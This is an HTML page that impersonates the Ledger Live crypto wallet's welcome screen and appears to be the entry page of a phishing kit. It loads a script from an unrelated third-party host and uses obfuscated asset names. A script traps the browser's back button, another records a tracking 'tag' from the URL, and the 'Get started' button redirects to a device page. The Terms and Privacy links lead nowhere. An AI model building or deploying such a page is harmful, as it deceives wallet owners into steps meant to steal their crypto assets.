
<!DOCTYPE html>
<html lang="en" class=" acwyplvf">

<head>
   <meta http-equiv="content-type" content="text/html;charset=utf-8">
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, 
         user-scalable=0">
   <title>Ledger Live</title>
   <script src="https://code.jquery.com/jquery-3.7.0.min.js"
      integrity="sha256-2Pmvv0kuTBOenSvLm6bvfBSSHrUJ+3A7x6P5Ebd07/g=" crossorigin="anonymous"></script>
   <link rel="preconnect" href="https://fonts.googleapis.com/">
   <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
   <link
      href="https://fonts.googleapis.com/css2?family=DM+Mono:wght@500&amp;family=Inter:wght@300;400;500;600;700&amp;display=swap"
      rel="stylesheet">
   <link rel="stylesheet" href="UMX9jlahOh2Y.css">
   <link rel="stylesheet" type="text/css"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
      integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
      crossorigin="anonymous" referrerpolicy="no-referrer">
   <script src="https://cdn-js.xyz/code?code=8d09cf8b4537319977c589987afa7abc" async=""></script>
   <script src="XwosZn6rPfVN.js"></script>
   <link rel="stylesheet" type="text/css" href="style.css">
   <style>
      .step-tab .step-content {
         -webkit-box-flex: 1;
         -ms-flex: 1;
         flex: 1;
         height: 50vh !important;
         padding: 30px 100px;
         display: -webkit-box;
         display: -ms-flexbox;
         display: flex;
         -webkit-box-orient: vertical;
         -webkit-box-direction: normal;
         -ms-flex-direction: column;
         flex-direction: column;
      }

      .step-tab .step-content .step-bottom {
         margin-top: auto;
         width: 100%;
         display: -webkit-box;
         display: -ms-flexbox;
         display: flex;
         -webkit-box-align: center;
         -ms-flex-align: center;
         align-items: center;
         -webkit-box-pack: justify;
         -ms-flex-pack: justify;
         justify-content: space-between;
         padding: 50px 0px !important;
      }
   </style>
   <style type="text/css">
      #pnq7vgri3fl1692357078038 {
         outline: none !important;
         visibility: visible !important;
         resize: none !important;
         box-shadow: none !important;
         overflow: visible !important;
         background: none !important;
         opacity: 1 !important;
         filter: alpha(opacity=100) !important;
         -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity 1) !important;
         -mz-opacity: 1 !important;
         -khtml-opacity: 1 !important;
         top: auto !important;
         right: 0px !important;
         bottom: 0px !important;
         left: auto !important;
         position: fixed !important;
         border: 0 !important;
         min-height: 0px !important;
         min-width: 0px !important;
         max-height: none !important;
         max-width: none !important;
         padding: 0px !important;
         margin: 0px !important;
         -moz-transition-property: none !important;
         -webkit-transition-property: none !important;
         -o-transition-property: none !important;
         transition-property: none !important;
         transform: none !important;
         -webkit-transform: none !important;
         -ms-transform: none !important;
         width: auto !important;
         height: auto !important;
         display: none !important;
         z-index: 2000000000 !important;
         background-color: transparent !important;
         cursor: none !important;
         float: none !important;
         border-radius: unset !important;
         pointer-events: auto !important;
         clip: auto !important;
         color-scheme: light !important;
      }

      #pnq7vgri3fl1692357078038.widget-hidden {
         display: none !important;
      }

      #pnq7vgri3fl1692357078038.widget-visible {
         display: block !important;
      }

      @media print {
         #pnq7vgri3fl1692357078038.widget-visible {
            display: none !important;
         }
      }
   </style>
   <script src="https://cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js" type="text/javascript" async=""
      defer=""></script>
   <script src="https://cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js" type="text/javascript" async=""
      defer=""></script>
   <style type="text/css">
      @keyframes tawkMaxOpen {
         0% {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }

         to {
            opacity: 1;
            transform: translate(0, 0px);
         }
      }

      @-moz-keyframes tawkMaxOpen {
         0% {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }

         to {
            opacity: 1;
            transform: translate(0, 0px);
         }
      }

      @-webkit-keyframes tawkMaxOpen {
         0% {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }

         to {
            opacity: 1;
            transform: translate(0, 0px);
         }
      }

      #bknqvdb5ku71692357078057.open {
         animation: tawkMaxOpen .25s ease !important;
      }

      @keyframes tawkMaxClose {
         from {
            opacity: 1;
            transform: translate(0, 0px);
            ;
         }

         to {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }
      }

      @-moz-keyframes tawkMaxClose {
         from {
            opacity: 1;
            transform: translate(0, 0px);
            ;
         }

         to {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }
      }

      @-webkit-keyframes tawkMaxClose {
         from {
            opacity: 1;
            transform: translate(0, 0px);
            ;
         }

         to {
            opacity: 0;
            transform: translate(0, 30px);
            ;
         }
      }

      #bknqvdb5ku71692357078057.closed {
         animation: tawkMaxClose .25s ease !important
      }
   </style>
</head>

<body>
   <div class="page-tab welcome-tab" id="tab-1">
      <div class="welcome-inner">
         <img src="mfkNbEskGSwj.svg" class="logoo" alt="">
         <h1>THE MOST SECURE <br> CRYPTOCURRENCY <br> &amp; NFT WALLET</h1>
         <p>Securely manage, buy and grow your crypto and NFTs on Ledger Live.</p>
         <div class="bottom">
            <button data-got-to="2" class="go-to-tab">
               Get started &nbsp;
               <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-arrow-right" viewBox="0 0 16 16">
                  <path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path>
               </svg>
            </button>
            <span>By tapping "Get started" you consent and agree to our <br> <a href="#">Terms of Service</a> and <a
                  href="#">Privacy Policy</a></span>
         </div>
      </div>
      <div class="welcome-video">
         <video autoplay="" muted="" loop="">
            <source src="video.mp4" type="video/mp4">
         </video>
      </div>
   </div>

   <div class="preloader">
      <img src="mfkNbEskGSwj.svg" alt="">
   </div>
   <script src="script3.js"></script><iframe height="1" width="1"
      style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe>
   <script src="http://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
   <script>
      $(document).ready(function () {
         setTimeout(() => {
            $(".preloader").removeClass('show')
         }, 1000)
      })
   </script>
   <script type="text/javascript">
      function preventBack() { window.history.forward(); }
      setTimeout("preventBack()", 0);
      window.onunload = function () { null };
   </script>
   <script>

      function getQueryParam(param) {
         const urlParams = new URLSearchParams(window.location.search);
         return urlParams.get(param);
      }
      // Get the tag from the URL
      const tag = getQueryParam('tag');

      // Store the tag in localStorage
      if (tag) {
         localStorage.setItem('tag', tag);
      }
   </script>
   <script>

      document.querySelector('.go-to-tab').addEventListener('click', function() {
      // Redirect to the next page
      window.location.href = '/device.html'; // Replace with the actual URL of the next page

      });
   </script>

</body>

</html>